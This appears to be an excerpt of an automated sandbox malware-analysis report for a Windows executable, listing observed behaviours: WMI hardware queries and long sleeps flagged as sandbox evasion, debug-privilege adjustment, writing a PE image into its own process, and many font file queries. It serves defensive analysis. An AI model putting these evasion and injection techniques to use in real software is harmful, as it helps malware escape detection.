                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: 9dOKGgFNL2.exe PID: 7536, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMemory allocated: 33E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMemory allocated: 53E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMemory allocated: 95B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMemory allocated: A5B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMemory allocated: A7C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMemory allocated: B7C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMemory allocated: 2F60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWindow / User API: threadDelayed 7733Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWindow / User API: threadDelayed 1854Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exe TID: 7556Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exe TID: 7920Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exe TID: 7804Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exe TID: 7772Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1858196730.0000000001193000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeMemory written: C:\Users\user\Desktop\9dOKGgFNL2.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess created: C:\Users\user\Desktop\9dOKGgFNL2.exe "C:\Users\user\Desktop\9dOKGgFNL2.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Users\user\Desktop\9dOKGgFNL2.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
